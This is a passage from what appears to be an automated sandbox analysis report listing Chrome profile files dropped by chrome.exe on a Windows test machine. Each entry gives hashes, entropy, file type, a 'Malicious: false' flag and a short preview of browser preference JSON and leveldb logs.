Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ce189d4f-950f-45db-8bbb-c6c78a61b9a6.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d79ff584-f405-453e-ba88-df68519d04c2.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4219
Entropy (8bit):	4.871684703914691
Encrypted:	false
SSDEEP:	48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
MD5:	EDC4A4E22003A711AEF67FAED28DB603
SHA1:	977E551B9ED5F60D018C030B0B4AA2E33B954556
SHA-256:	DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
SHA-512:	84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\d9a839b6-4ae3-4634-8498-5b329fcc1852.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	17691
Entropy (8bit):	5.587903684981469
Encrypted:	false
SSDEEP:	384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHGn6zhO49:TLl9i1kXqKf/pUZNCgVLH2HfgrUbGnk7
MD5:	17FB514C5D9118D9D82C756EDC552434
SHA1:	32B432BCCFF90AEAFD84BF96ECEEFFB05F94E585
SHA-256:	535F48D3E5C20335C247AB335771EF1231D04758B751A2D8C8D6C4F93CD85581
SHA-512:	BAFE3033F2F41DA3EBD6F3A4631BA0D7ABF4AFB1436FEB73FAE83D8516D698F94CD00D31968EBF1ECE413967465DA0A1C168A219BAEAC75C531EC0EE0F49D129
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Rv:1qIFJ
MD5:	6752A1D65B201C13B62EA44016EB221F
SHA1:	58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:	0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:	9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:	false
Preview:	MANIFEST-000004.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Rv:1qIFJ
MD5:	6752A1D65B201C13B62EA44016EB221F
SHA1:	58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:	0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:	9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:	false
Preview:	MANIFEST-000004.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	139
Entropy (8bit):	4.601032299105731
Encrypted:	false
SSDEEP:	3:tUKclVdyFTpgZmwv2JlVdxUFtSO0V8tJlVdxVu2l0WGv:mBPdyFdgZmw2PdSD0VWPdHZ0tv
MD5:	EA8D8C38C5AC550FE996BE374BAA55D0
SHA1:	20D352807FCE0082C4632D9C949C74A67E470FA1
SHA-256:	CA1482D6159A1C71217A16749AA577585B6397C6DD87423A9DD913297CBFFEE4
SHA-512:	9108B9339007D625373877E18E972A83755D886DEC34C88314F0B2433CEDD5F12388EC61A010D8BFACFBCEC9ABB84C021C05F15CB87304A064BE2342D2E5771B
Malicious:	false
Preview:	2021/12/06-19:08:54.415 1e6c Recovering log #3.2021/12/06-19:08:54.736 1e6c Delete type=0 #3.2021/12/06-19:08:54.737 1e6c Delete type=3 #2.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	139
Entropy (8bit):	4.601032299105731
Encrypted:	false
SSDEEP:	3:tUKclVdyFTpgZmwv2JlVdxUFtSO0V8tJlVdxVu2l0WGv:mBPdyFdgZmw2PdSD0VWPdHZ0tv
MD5:	EA8D8C38C5AC550FE996BE374BAA55D0
SHA1:	20D352807FCE0082C4632D9C949C74A67E470FA1
SHA-256:	CA1482D6159A1C71217A16749AA577585B6397C6DD87423A9DD913297CBFFEE4
SHA-512:	9108B9339007D625373877E18E972A83755D886DEC34C88314F0B2433CEDD5F12388EC61A010D8BFACFBCEC9ABB84C021C05F15CB87304A064BE2342D2E5771B
Malicious:	false
Preview:	2021/12/06-19:08:54.415 1e6c Recovering log #3.2021/12/06-19:08:54.736 1e6c Delete type=0 #3.2021/12/06-19:08:54.737 1e6c Delete type=3 #2.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	50
Entropy (8bit):	5.028758439731456
Encrypted:	false
SSDEEP:	3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
MD5:	031D6D1E28FE41A9BDCBD8A21DA92DF1
SHA1:	38CEE81CB035A60A23D6E045E5D72116F2A58683
SHA-256:	B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
SHA-512:	E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
Malicious:	false
Preview:	V........leveldb.BytewiseComparator...#...........

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f9237338-49ec-4c60-a5ab-90248559707a.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4844
Entropy (8bit):	4.9581664102636305
Encrypted:	false
SSDEEP:	48:YciUkPkTiHj5c39EqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3KhmeSz:n6A39pt9pcKI5ok0JCKL8VbOTQVuwn
MD5:	BD94BBEA2439066F1FD0EB66BE4E90A9
SHA1:	B7096CEBADC6D72C12556E4C0C5E1563AF45740C
SHA-256:	F44C94FA5D239A85AA654E870BB3787B5C7D66342F17F05BBD53F6703407E53C
SHA-512:	DB14EC4D83275FCAFB0CC5160C1CBFD618A37D01BC43F5CD8FC9B7ACEA5153954B61B91C7547F158BC82790AB2C5A913D1018F7396BDA0AFED23DFE73F5ACC8D
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f9ab98df-ef42-4389-b2c9-946baa25ce5e.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	17690
Entropy (8bit):	5.587825848598147
Encrypted:	false
SSDEEP:	384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHG46fO4J:TLl9i1kXqKf/pUZNCgVLH2HfgrUbG4mz
MD5:	8CCF846D429115E4B5B6A9DC8D365FC6
SHA1:	6B1656E1FEC83852BB8CD649AAFF04AA28651ED1
SHA-256:	2D6F6D4974231A16917A5921B2FBFAC94C25BBF38BBA5C3AFADD0E6C3453369C
SHA-512:	BC1F1F4F64F4F8BB007B61D88F6805445B133FAE79A9740E1DC20772054509BB89CF70E89962ED4C91D7B903B3618377261417B1318E134B0CC45E43C5CCA403
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ffcd03a3-b197-4daa-b9ee-f3cc93fa57ab.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	5467
Entropy (8bit):	5.186977647949688
Encrypted:	false
SSDEEP:	96:n6A3kpt9Uz0aScKI5ok0JCKL8ibOTQVuwn:n6xH9UwcO4Kf
MD5:	B5E0AF68004C8ABAFC6802C2DFC85C25
SHA1:	6FAB370712F0A7531781E74E3FC101BDF4C4387E
SHA-256:	5503C11BDC411307B4290160BE95B68192437F7B95D6F8A022366D476786BD37
SHA-512:	307878330359C8B528FD5674FB99D6F27E7A1478D86B42CAFC1C879BC2BD90C066BCB02138ED2A40D448906201CA92EFD2844DAEDD27C57B17D1B07D65C5ACD0
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.2278007006470455
Encrypted:	false
SSDEEP:	6:mBPdxYo+q2PWXp+N23iKKdKfrzAdIFUtAPdxumWZmw2PdxPVkwOWXp+N23iKKdKS:uP5+va5Kk9FUtAPa/2PfV5f5Kk2J
MD5:	71050F4520CC6F020D528D6E879B6EE9
SHA1:	262A8B0086058E9DBF2FEBD30CFF4D30C11E6043
SHA-256:	2FF434C858A9476E6425B08337AB6D035D1E9B156EDDBEBCD35A8EBADFB34E8C
SHA-512:	731F79720FB643F4C51E3374E083642CCE846CAA61BC185E89887C5CF88B984E812565B10562E93F831FE5FD3E9D4520B5A60318B696C61CCFD5340D4800CFB0
Malicious:	false
Preview:	2021/12/06-19:08:55.084 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/12/06-19:08:55.085 1b0c Recovering log #3.2021/12/06-19:08:55.086 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.2278007006470455
Encrypted:	false
SSDEEP:	6:mBPdxYo+q2PWXp+N23iKKdKfrzAdIFUtAPdxumWZmw2PdxPVkwOWXp+N23iKKdKS:uP5+va5Kk9FUtAPa/2PfV5f5Kk2J
MD5:	71050F4520CC6F020D528D6E879B6EE9
SHA1:	262A8B0086058E9DBF2FEBD30CFF4D30C11E6043
SHA-256:	2FF434C858A9476E6425B08337AB6D035D1E9B156EDDBEBCD35A8EBADFB34E8C
SHA-512:	731F79720FB643F4C51E3374E083642CCE846CAA61BC185E89887C5CF88B984E812565B10562E93F831FE5FD3E9D4520B5A60318B696C61CCFD5340D4800CFB0
Malicious:	false
Preview:	2021/12/06-19:08:55.084 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/12/06-19:08:55.085 1b0c Recovering log #3.2021/12/06-19:08:55.086 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	106
Entropy (8bit):	3.138546519832722
Encrypted:	false
SSDEEP:	3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
MD5:	DE9EF0C5BCC012A3A1131988DEE272D8
SHA1:	FA9CCBDC969AC9E1474FCE773234B28D50951CD8
SHA-256:	3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
SHA-512:	CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.8150724101159437
Encrypted:	false
SSDEEP:	3:Yx7:4
MD5:	C422F72BA41F662A919ED0B70E5C3289
SHA1:	AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
SHA-256:	02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
SHA-512:	86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
Malicious:	false
Preview:	85.0.4183.121

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	189511
Entropy (8bit):	6.045222825600431
Encrypted:	false
SSDEEP:	3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
MD5:	DAC43F6C68D10D4B09DFF418FCB32275
SHA1:	FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
SHA-256:	6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
SHA-512:	9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State4 (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	189605
Entropy (8bit):	6.045488285632766
Encrypted:	false
SSDEEP:	3072:q8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:rjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
MD5:	3FFD73F9E5718D722FF2012F1CD49DCF
SHA1:	E23AFF0EFFDEE0DB365B5D2DB5B99B1C8835461E
SHA-256:	7C8D9EDF38CE3AD6DB57FC16D62E41686CC9BC32729D689D2C36C8C4C3FC67B1
SHA-512:	61543123BD8DF7B63552384EB9B45769867FA4107D0821D80CF2479407B97205C5A8E5DFF398B0D29E65721B9DE45F963A89361DF15421022C09ADC132175CFF
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local States (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	189511
Entropy (8bit):	6.045222825600431
Encrypted:	false
SSDEEP:	3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
MD5:	DAC43F6C68D10D4B09DFF418FCB32275
SHA1:	FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
SHA-256:	6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
SHA-512:	9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	95428
Entropy (8bit):	3.7425053390199685
Encrypted:	false
SSDEEP:	384:V9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my2IiNzTTcOxZU:LxGa11yZMcsezvRJYnH+VKPdT5a
MD5:	2962389534DB7C2E8F194959F3C101B5
SHA1:	2DC6429B9F0B5E727245CFE2B9F57348CD7B1130
SHA-256:	6D60D6581FDA86B771D62E9FCA80B9A435EB5CD4DBE5E5CC7808F4FA36D10B92
SHA-512:	E1BFF43BF98FE36016FA6B80DD0B8DB1DB774582D9E1F578790AD8659B44CEFA9997E96A0F7E010809B30D79D7040CF14534A42E1108E26B8E1454F0B519C118
Malicious:	false
Preview:	.t.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info CacheMP (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SysEx File -
Category:	dropped
Size (bytes):	94708
Entropy (8bit):	3.7427683621330914
Encrypted:	false
